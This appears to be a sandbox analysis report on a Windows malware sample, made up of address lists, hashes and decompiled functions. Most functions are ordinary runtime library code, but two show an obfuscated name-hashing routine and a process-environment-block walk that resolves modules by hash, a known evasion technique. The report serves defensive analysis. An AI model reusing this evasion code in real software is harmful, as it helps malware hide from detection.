0x0040bced
0x0040bcf2
0x0040bcf2
0x00000000
0x00000000
0x0040bcfa
0x0040bcfb
0x00000000
0x00000000
0x0040bd00
0x0040bd03
0x0040bd06
0x0040bd09
0x0040bd0a
0x0040bd0a
0x0040bd0e
0x00000000
0x00000000
0x0040bd15
0x0040bd19
0x0040bd1e
0x0040bd1e
0x00000000
0x00000000
0x0040bd24
0x0040bd27
0x0040bd29
0x00000000
0x00000000
0x0040bd30
0x0040bd33
0x0040bd36
0x0040bd39
0x0040bd3c
0x0040bd3f
0x0040bd42
0x0040bd45
0x0040bd56
0x0040bd57
0x0040bd5e
0x0040bd5e
0x0040bd60
0x00000000
0x0040bd60
0x0040bd4d
0x0040bd4e
0x0040bd51
0x00000000
0x00000000
0x0040bd67
0x0040bd68
0x0040bd68
0x0040bd6a
0x00000000
0x00000000
0x0040bd91
0x0040bd92
0x0040bd95
0x0040bd97
0x00000000
0x00000000
0x0040bb1c
0x0040bb1f
0x0040bb22
0x0040bb25
0x0040bb26
0x0040bb26
0x00000000
0x00000000
0x0040bd6e
0x0040bd71
0x0040bd72
0x0040bd72
0x0040bd75
0x0040bd75
0x0040bd76
0x0040bd7a
0x0040bd7a
0x00000000
0x00000000
0x0040bd7d
0x0040bd80
0x0040bd83
0x0040bd86
0x0040bd87
0x0040bd87
0x0040bd88
0x0040bd8b
0x0040bd8b
0x0040bd8d
0x00000000
0x00000000
0x0040bd9e
0x0040bda1
0x0040bda4
0x0040bda7
0x0040bda8
0x0040bdac
0x0040bdaf
0x0040bdb0
0x0040bdb4
0x0040bdb5
0x0040bdb7
0x0040bdb9
0x0040b962
0x0040b962
0x0040b964
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bdc1
0x0040bdc3
0x0040bdc5
0x0040bdc7
0x0040bdca
0x00000000
0x00000000
0x0040bb06
0x0040bb06
0x0040bb0d
0x0040bb12
0x0040bb12
0x00000000
0x00000000
0x0040baa9
0x0040baf7
0x0040bafa
0x0040bafa
0x0040bafa
0x0040bb01
0x00000000
0x0040bb01
0x0040ba29
0x0040ba2b
0x0040ba2e
0x00000000
0x00000000
0x0040ba30
0x0040ba36
0x0040ba39
0x0040ba3e
0x0040ba40
0x00000000
0x00000000
0x0040ba46
0x0040ba4d
0x00000000
0x00000000
0x00000000
0x0040ba4f
0x0040b9a7
0x0040b9ab
0x00000000
0x00000000
0x0040b9ad
0x0040b9b3
0x0040b9bd
0x0040b9bd
0x0040b9c3
0x0040b9cd
0x0040b9d3
0x0040b9d6
0x00000000
0x00000000
0x0040b9d8
0x0040b9e6
0x0040b9ec
0x0040b9ee
0x00000000
0x00000000
0x00000000
0x0040b9ee
0x0040b9c5
0x0040b9cb
0x00000000
0x00000000
0x00000000
0x0040b9cb
0x0040b9b5
0x0040b9bb
0x00000000
0x00000000
0x00000000
0x0040b98c
0x0040b997
0x0040b99c
0x0040b99e
0x0040b934
0x0040b934
0x0040bded
0x0040bded
0x0040bdf2
0x0040bdf7
0x0040bdf7
0x0040bdf9
0x0040be00
0x0040be07
0x0040bb14
0x0040bb19
0x0040bb19
0x00000000
0x0040b99e
0x0040b98a
0x0040b945
0x0040b948
0x0040b94a
0x00000000
0x00000000
0x0040b955
0x0040b956
0x0040b957
0x0040b95c
0x00000000
0x0040b95c
0x0040b91e
0x0040b923
0x0040b92e
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 0040B8FD

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: e65aa5e75f71ceb4e916c33a80ae8f932e073520dab032e457e0a09d71efcd39
Instruction ID: 4bf9ee2ada31b43de44771026367bd4f410c07c662d257adfd4bce1bafcdad22
Opcode Fuzzy Hash: e65aa5e75f71ceb4e916c33a80ae8f932e073520dab032e457e0a09d71efcd39
Instruction Fuzzy Hash: 4FF15E70500209EFDB14EF55C890ABE77A9EF04314F10853AF856BA2D1DB39D901DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00420E68, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: b05d1c485ffc5c43cb726b4c692468c3c5463921e7f25a4bbdab425ae6e7abe6
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 63D17E73E0F9B34A8735816D605823BEAA26FE1B4035FC3E29CD03F38AD56A5D1195E4

Uniqueness

Uniqueness Score: -1.00%

Function 00420A48, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 418f030ebbb6c539e51a88d15c6d63b5d5043498393d93229f95693c7954ae97
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 60D17F73E1F9B34A8735816D605822BEEA26FD1B5035FC3E29CD43F38AD12A6D0195E4

Uniqueness

Uniqueness Score: -1.00%

Function 0042063C, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 4447e2b24c179b90595797b278d5a2c6431516569a5834c48723a0ebec94e960
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: ECC18F73E0F9B34A8735816D506862BEEA26FD1B4035FC3E28CD43F38A916A6D0195E4

Uniqueness

Uniqueness Score: -1.00%

Function 00420268, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: d8b5424b5b77e9ba22606841dae47174b735cf4b48cc0264be74afe96b7479b7
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: EFC17073E0F5B34A8735812D616812BEEA26FD1B4135EC3E38CD43F38AD56A6D0195E4

Uniqueness

Uniqueness Score: -1.00%

Function 02252AEA, Relevance: .1, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02252AEA(char* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _t125;
				signed int _t127;
				signed int _t128;
				signed int _t146;

				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v60 = 0x63750aa;
				_v56 = 0xb3018990;
				_v52 = 0x7db474ba;
				_v48 = 0x3225899;
				_v44 = 0x5d32f0aa;
				_v40 = 0xdd0fa6dc;
				_v36 = 0x511dfadc;
				_v32 = 0xd4d99c8a;
				_v28 = 0x414c179a;
				_v24 = 0x20d4e2b7;
				_v12 = 0xfcba;
				_v12 = _v12 ^ 0xa6c2fe7d;
				_v12 = _v12 >> 0x10;
				_t125 = __ecx;
				_t127 = 0x7d;
				_v12 = _v12 / _t127;
				_v12 = _v12 << 0xd;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x54000000;
				_v8 = 0x4f36;
				_v8 = _v8 + 0xae67;
				_v8 = _v8 + 0xffffa2bb;
				_v8 = _v8 + 0xa00e;
				_t128 = 0x62;
				_v8 = _v8 / _t128;
				_v8 = _v8 + 0xffffc4b7;
				_t146 = 0x32;
				_v8 = _v8 / _t146;
				_v8 = _v8 ^ 0xc4105c7d;
				_v8 = _v8 ^ 0xc10eeb48;
				_v8 = 0x2c57;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x3b42b64d;
				_v8 = _v8 ^ 0x3b42b64f;
				if( *__ecx != 0) {
					do {
						_v8 = 0x4f36;
						_v8 = _v8 + 0xae67;
						_v8 = _v8 + 0xffffa2bb;
						_v8 = _v8 + 0xa00e;
						_v8 = _v8 / _t128;
						_v8 = _v8 + 0xffffc4b7;
						_v8 = _v8 / _t146;
						_v8 = _v8 ^ 0xc4105c7d;
						_v8 = _v8 ^ 0xc10eeb48;
						_v8 = 0x2c57;
						_v8 = _v8 >> 4;
						_v8 = _v8 >> 5;
						_v8 = _v8 | 0x3b42b64d;
						_v8 = _v8 ^ 0x3b42b64f;
						_v12 =  *_t125;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t125 = _t125 + 1;
						_t128 = 0x62;
						_t146 = 0x32;
					} while ( *_t125 != 0);
				}
				return _v12;
			}

0x02252af0
0x02252af6
0x02252afa
0x02252b01
0x02252b08
0x02252b0f
0x02252b16
0x02252b1d
0x02252b24
0x02252b2b
0x02252b32
0x02252b39
0x02252b40
0x02252b47
0x02252b4e
0x02252b59
0x02252b5b
0x02252b60
0x02252b65
0x02252b69
0x02252b6d
0x02252b74
0x02252b7b
0x02252b82
0x02252b89
0x02252b93
0x02252b98
0x02252b9d
0x02252ba7
0x02252baa
0x02252bad
0x02252bb4
0x02252bbb
0x02252bc2
0x02252bc6
0x02252bca
0x02252bd1
0x02252bdb
0x02252be2
0x02252be7
0x02252bee
0x02252bf5
0x02252bfc
0x02252c0a
0x02252c0d
0x02252c1b
0x02252c1e
0x02252c25
0x02252c32
0x02252c39
0x02252c3d
0x02252c41
0x02252c48
0x02252c5a
0x02252c5d
0x02252c62
0x02252c65
0x02252c68
0x02252c69
0x02252c6c
0x02252c6d
0x02252c76
0x02252c7f

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f3d2a3ec99de75330360b9048c52887a3ab58b5cf868be08c74c3ef050c9a4
Instruction ID: 6f860351f67b6af65f65f7c563294a47a6fd2e4fef92f2d4513905f049998d59
Opcode Fuzzy Hash: e0f3d2a3ec99de75330360b9048c52887a3ab58b5cf868be08c74c3ef050c9a4
Instruction Fuzzy Hash: 1741CCB1D0271CEFEB15CFA5C6896DEFBB1AB55328F20C089C040AB294D3B55B45EB81

Uniqueness

Uniqueness Score: -1.00%

Function 02252EC1, Relevance: .0, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02252EC1(void* __ecx) {
				void* _t9;
				intOrPtr* _t13;
				intOrPtr* _t14;

				_t9 = __ecx;
				_t13 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				_t14 =  *_t13;
				while(_t14 != _t13) {
					if((E02252C80( *((intOrPtr*)(_t14 + 0x30))) ^ 0x7a1628f1) == _t9) {
						return  *((intOrPtr*)(_t14 + 0x18));
					}
					_t14 =  *_t14;
				}
				return 0;
			}

0x02252ecd
0x02252ecf
0x02252ed2
0x02252ee9
0x02252ee5
0x00000000
0x02252ef3
0x02252ee7
0x02252ee7
0x00000000

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bfe828df6a8f02fb092adc4ca50bb5b758bda64b22ec1e022768fd2f382f04c
Instruction ID: aadc6d23e4131fa7c67c58f409402c9f582b77b6b898041c8be5cbf7b7e3d2ac
Opcode Fuzzy Hash: 2bfe828df6a8f02fb092adc4ca50bb5b758bda64b22ec1e022768fd2f382f04c
Instruction Fuzzy Hash: 75E04F32734561CBD660DAD9D880956F3E5FB8027172A896ADD45D3A44C374BC00C680

Uniqueness

Uniqueness Score: -1.00%

Function 022537AF, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E022537AF() {

				return  *[fs:0x30];
			}

0x022537b5

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00424996, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00424996(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x446a2c = GetProcAddress(_t37, "FlsAlloc");
					 *0x446a30 = GetProcAddress(_t37, "FlsGetValue");
					 *0x446a34 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x446a2c;
					_t40 = TlsSetValue;
					 *0x446a38 = _t7;
					if( *0x446a2c == 0) {
						L6:
						 *0x446a30 = TlsGetValue;
						 *0x446a2c = E004246B6;
						 *0x446a34 = _t40;
						 *0x446a38 = TlsFree;
					} else {
						__eflags =  *0x446a30;
						if( *0x446a30 == 0) {
							goto L6;
						} else {
							__eflags =  *0x446a34;
							if( *0x446a34 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x4438c0 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x446a30);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E0041FBD2();
							 *0x446a2c = E004245E7( *0x446a2c);
							 *0x446a30 = E004245E7( *0x446a30);
							 *0x446a34 = E004245E7( *0x446a34);
							 *0x446a38 = E004245E7( *0x446a38);
							_t18 = E00422CB7();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004246E9();
								goto L15;
							} else {
								_push(E00424875);
								_t21 =  *((intOrPtr*)(E00424653( *0x446a2c)))();
								__eflags = _t21 - 0xffffffff;
								 *0x4438bc = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E004265A8(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x4438bc);
										__eflags =  *((intOrPtr*)(E00424653( *0x446a34)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00424726(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004246E9();
					return 0;
				}
			}

0x00424996
0x004249a2
0x004249a6
0x004249c6
0x004249d3
0x004249e0
0x004249e5
0x004249e7
0x004249ee
0x004249f4
0x004249f9
0x00424a11
0x00424a16
0x00424a20
0x00424a2a
0x00424a30
0x004249fb
0x004249fb
0x00424a02
0x00000000
0x00424a04
0x00424a04
0x00424a0b
0x00000000
0x00424a0d
0x00424a0d
0x00424a0f
0x00000000
0x00000000
0x00424a0f
0x00424a0b
0x00424a02
0x00424a35
0x00424a3b
0x00424a3e
0x00424a43
0x00424b15
0x00424b15
0x00424b15
0x00424a49
0x00424a50
0x00424a52
0x00424a54
0x00000000
0x00424a5a
0x00424a5a
0x00424a70
0x00424a80
0x00424a90
0x00424a9d
0x00424aa2
0x00424aa7
0x00424aa9
0x00424b10
0x00424b10
0x00000000
0x00424aab
0x00424aab
0x00424abc
0x00424abe
0x00424ac1
0x00424ac6
0x00000000
0x00424ac8
0x00424ad4
0x00424ad6
0x00424ada
0x00000000
0x00424adc
0x00424adc
0x00424add
0x00424af1
0x00424af3
0x00000000
0x00424af5
0x00424af5
0x00424af7
0x00424af8
0x00424aff
0x00424b05
0x00424b09
0x00424b0d
0x00424b0d
0x00424af3
0x00424ada
0x00424ac6
0x00424aa9
0x00424a54
0x00424b19
0x004249a8
0x004249a8
0x004249b0
0x004249b0

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041F5CD), ref: 0042499C
__mtterm.LIBCMT ref: 004249A8

Part of subcall function 004246E9: __decode_pointer.LIBCMT ref: 004246FA
Part of subcall function 004246E9: TlsFree.KERNEL32(00000020,00424B15), ref: 00424714

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004249BE
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004249CB
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004249D8
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004249E5
TlsAlloc.KERNEL32 ref: 00424A35
TlsSetValue.KERNEL32(00000000), ref: 00424A50
__init_pointers.LIBCMT ref: 00424A5A
__encode_pointer.LIBCMT ref: 00424A65
__encode_pointer.LIBCMT ref: 00424A75
__encode_pointer.LIBCMT ref: 00424A85
__encode_pointer.LIBCMT ref: 00424A95
__decode_pointer.LIBCMT ref: 00424AB6
__calloc_crt.LIBCMT ref: 00424ACF
__decode_pointer.LIBCMT ref: 00424AE9
__initptd.LIBCMT ref: 00424AF8
GetCurrentThreadId.KERNEL32 ref: 00424AFF

Strings

FlsFree, xrefs: 004249DA
FlsSetValue, xrefs: 004249CD
FlsAlloc, xrefs: 004249B8
KERNEL32.DLL, xrefs: 00424997
FlsGetValue, xrefs: 004249C0

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: 7b02d7ed6b3b6a7ce64f6f14d22585a98f71800e69ec1092eb72b2d7174e1ea0
Instruction ID: 963e8a1070996f63c3d0f3f4c191d7009e08024d37f58c6308c9cc54aea640d7
Opcode Fuzzy Hash: 7b02d7ed6b3b6a7ce64f6f14d22585a98f71800e69ec1092eb72b2d7174e1ea0
Instruction Fuzzy Hash: 13318079740B209BCB116B79BC05B067AA4EB87754B51853BE410B2AA0DF79D480CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD37, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CD37(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x0041cd44
0x0041cd4d
0x0041cd56
0x0041cd60
0x0041cd6a
0x0041cd74
0x0041cd7e
0x0041cd88
0x0041cd92
0x0041cd9c
0x0041cda6
0x0041cdb0
0x0041cdb5
0x0041cdbc

APIs

RegisterClipboardFormatA.USER32 ref: 0041CD46
RegisterClipboardFormatA.USER32 ref: 0041CD4F
RegisterClipboardFormatA.USER32 ref: 0041CD59
RegisterClipboardFormatA.USER32 ref: 0041CD63
RegisterClipboardFormatA.USER32 ref: 0041CD6D
RegisterClipboardFormatA.USER32 ref: 0041CD77
RegisterClipboardFormatA.USER32 ref: 0041CD81
RegisterClipboardFormatA.USER32 ref: 0041CD8B
RegisterClipboardFormatA.USER32 ref: 0041CD95
RegisterClipboardFormatA.USER32 ref: 0041CD9F
RegisterClipboardFormatA.USER32 ref: 0041CDA9
RegisterClipboardFormatA.USER32 ref: 0041CDB3

Strings

Link Source Descriptor, xrefs: 0041CD83
OwnerLink, xrefs: 0041CD48
Embedded Object, xrefs: 0041CD5B
FileName, xrefs: 0041CD8D
Object Descriptor, xrefs: 0041CD79
RichEdit Text and Objects, xrefs: 0041CDAB
Rich Text Format, xrefs: 0041CDA1
Native, xrefs: 0041CD3F
ObjectLink, xrefs: 0041CD51
Link Source, xrefs: 0041CD6F
FileNameW, xrefs: 0041CD97
Embed Source, xrefs: 0041CD65

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: fa62fb11877792a06cbeae9f6a028dd3d60365e63ae9067f928d27611659888e
Instruction ID: 185d9513e9e3c8f8d91afcc4ef31229a7346f959b1470ae00d2bb1a9d435a8cc
Opcode Fuzzy Hash: fa62fb11877792a06cbeae9f6a028dd3d60365e63ae9067f928d27611659888e
Instruction Fuzzy Hash: 1E0139B2A447845ACF30AF769C09907BAE0EEC9B10721696FE4C587750D6B8D401DF88

Uniqueness

Uniqueness Score: -1.00%

Function 0041C757, Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041C757(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E0041F6EA(E0043377E, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E0041F7C2(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E0041F330(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x437058;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
